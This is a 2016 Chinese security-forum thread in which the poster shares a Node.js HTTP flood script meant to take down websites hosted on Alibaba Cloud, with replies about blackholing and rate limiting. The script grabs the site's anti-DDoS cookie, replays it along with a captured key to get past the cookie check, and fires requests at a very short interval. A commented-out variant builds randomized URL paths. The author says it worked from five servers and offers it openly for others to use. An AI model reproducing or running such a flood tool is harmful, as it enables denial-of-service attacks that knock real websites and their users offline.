一个脚本能打死阿里云

不良人 · 发表于 2016-1-10 00:16:24

之前在公司上班没事，学习nodejs ,  可以说压力山大，因学的建筑工程技术毕业  ，转行做互联网安全，对于我这种小白，哎！！
本脚本需要 nodejs 脚本代码 VPS 服务器。当时我采用了5台服务器基本上，能打死。。。。

虽然有cookie 验证机制，照样能绕过。。
  PS：本人小白，大牛勿喷！！  贴代码。睡觉
代码截图：

脚本代码

[JavaScript] 纯文本查看 复制代码

/*
  By：不良人
*/

console.log('Hello world');  //请无视输出！
var http = require('http');
var complete = 0;
var atkCount = 20;
function getCookie() {
    var options = {
        hostname: '对方域名或者IP', //仅限制网站
        port: 80, //默认80端口
        path: '这个我就不用说了吧！',
        agent: false,
        Conntion: 'Keep-Alive'
    };
    http.get(options, function (res) {
        console.log("Got response: " + res.statusCode);
        //   console.log(res.headers['set-cookie']);
        var src = res.headers['set-cookie'][0];
        var s1 = '=';
        var start = src.indexOf(s1);
        var end = src.indexOf(";");
        var cookie = src.substring(start + 1, end);
        //    console.log(src);
        //    console.log(cookie);
        getData(cookie);
    }).on('error', function (e) {
        console.log("Got error: " + e.message);
    });
}
function getData(cookie) {
    var hf_key_str = 'hf_skey = 2693953.2693953..1447381409.1.3971aafb8bd532f20976867edde553b2;';  //请更改抓包值
    var c1 = 'aliyungf_tc=' + cookie + '; ' + 'HttpOnly;' + hf_key_str + ' path=/;QCLOUD=a';       
    var c2 = 'aliyungf_tc=' + cookie + '; ' + 'HttpOnly;' + ' path=/;QCLOUD=a';
    var options = {
        hostname: '对方域名或者IP',
        port: 80,
        path: '网站路径路径',
        agent: false,
        Conntion: 'Keep-Alive',
        Cookie: c2
    };
    http.get(options, function (res) {
        console.log("Got response: " + res.statusCode);
        if (res.statusCode == 200) {
            complete += 1;
            console.log('complete = ' + complete);
        }
    }).on('error', function (e) {
        console.log("Got error: " + e.message);
    });
    // console.log(cookie);
}
function start() {
    getCookie();
}
/*
setInterval(() => {
    console.log('test');
}, 1000);
*/
function access() {
    var aa = '/index/getBoat/'; //请更改
    aa += Math.random() + '/';
    aa += Math.random() + '/';
    /*
    aa += '13';
    for (var i = 0; i < 9; i++) {
        aa += (Math.random() % 10 );
    }
    */
    aa += '/';
    aa += Math.random() + '/';
    aa += Math.random() + '/';
    aa += Math.random() + '/';
    aa += Math.random() + '/';
    aa += Math.random();
    //  var aa = '/index/getPwd/' + Math.random() + '/';
    var options = {
        hostname: '请更改',
        port: 80,
        path: aa,
        agent: false,
        Conntion: 'Keep-Alive'
    };
    http.get(options, function (res) {
        console.log("Got response: " + res.statusCode);
        if (res.statusCode == 200) {
            complete += 1;
            console.log('complete = ' + complete);
        }
    }).on('error', function (e) {
        console.log("Got error: " + e.message);
    });
}
setInterval(function () {
    start();
    //  access();
}, 1 / atkCount);

90_ · 发表于 2016-1-10 00:45:42

阿里号称5G防护，但实际是打一点过去就会直接进黑洞的

Antergone · 发表于 2016-1-10 01:12:47

额，这个怎么说呢，我觉得阿里内网打可能还有效，但是外网直接打，可能并没有什么效果。
很多时候，你的访问频率过高的情况下，直接ban掉你就OK了。
也有很多时候，直接会做熔断器，比如最常用的反复去get restful api。
在SOA架构的时候，很多都会在这里直接做一个熔断，打过来都直接被废弃了，除非你要耗尽硬件资源

HUC-参谋长 · 发表于 2016-1-10 05:11:13

感谢楼主的分享~

H.U.C—Prince · 发表于 2016-1-10 07:04:53

感谢楼主的分享~

fireworld · 发表于 2016-1-10 09:19:10

X0chitl · 发表于 2016-1-10 09:44:49

关键是怎么使用了？？？

萱萱 · 发表于 2016-1-10 18:31:29

额，涨姿势了

不良人 · 发表于 2016-1-10 22:37:10

90_ 发表于 2016-1-10 00:45
阿里号称5G防护，但实际是打一点过去就会直接进黑洞的

老大，说的没错，可以让对方直接黑洞崩溃！！

不良人 · 发表于 2016-1-10 22:38:03

Antergone 发表于 2016-1-10 01:12
额，这个怎么说呢，我觉得阿里内网打可能还有效，但是外网直接打，可能并没有什么效果。
很多时候，你的访 ...

这么怎么说呢！等过段时间有钱了，买点服务器，录个教程发给你们！

一个脚本能打死阿里云

评分

相关帖子

点评

点评

点评

点评

指导单位

旗下站点

联系我们